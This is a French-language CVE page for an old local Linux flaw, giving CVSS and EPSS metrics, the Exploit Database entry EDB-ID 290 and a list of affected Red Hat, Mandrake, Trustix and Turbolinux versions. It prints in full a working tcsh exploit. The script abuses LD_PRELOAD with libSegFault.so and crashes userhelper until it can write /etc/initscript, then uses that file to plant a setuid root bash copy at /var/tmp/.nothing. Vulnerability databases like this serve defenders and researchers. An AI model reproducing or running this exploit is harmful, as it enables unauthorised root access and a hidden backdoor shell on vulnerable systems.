Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
2.1 |
|
AV:L/AC:L/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 290
Date de publication : 2001-03-03 23h00 +00:00
Auteur : Shadow
EDB Vérifié : Yes
#!/bin/tcsh
# przyklad wykorzystania dziury w LD_PRELOAD
# shadow (tested on redhat 6.0, should work on others)
if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
cd /lib
umask 0
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
echo czekaj... to moze chwile potrwac...
while (! -e /etc/initscript )
( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null
end
echo utworzylem plik initscript
cat > /etc/initscript << _init_
cp /bin/bash /var/tmp/.nothing
chmod 6755 /var/tmp/.nothing
rm /etc/initscript
_init_
echo i nawet go podmienilem
# milw0rm.com [2001-03-04]
Products Mentioned
Configuraton 0
Mandrakesoft>>Mandrake_linux >> Version 6.0
Mandrakesoft>>Mandrake_linux >> Version 6.1
Mandrakesoft>>Mandrake_linux >> Version 7.0
Mandrakesoft>>Mandrake_linux >> Version 7.1
Mandrakesoft>>Mandrake_linux >> Version 7.2
Mandrakesoft>>Mandrake_linux_corporate_server >> Version 1.0.1
Redhat>>Linux >> Version 6.0
Redhat>>Linux >> Version 6.0
Redhat>>Linux >> Version 6.0
Redhat>>Linux >> Version 6.1
Redhat>>Linux >> Version 6.1
Redhat>>Linux >> Version 6.1
Redhat>>Linux >> Version 6.2
Redhat>>Linux >> Version 6.2
Redhat>>Linux >> Version 6.2
Trustix>>Secure_linux >> Version 1.1
Trustix>>Secure_linux >> Version 1.2
Turbolinux>>Turbolinux >> Version To (including) 6.0.5
Turbolinux>>Turbolinux >> Version 6.1
Références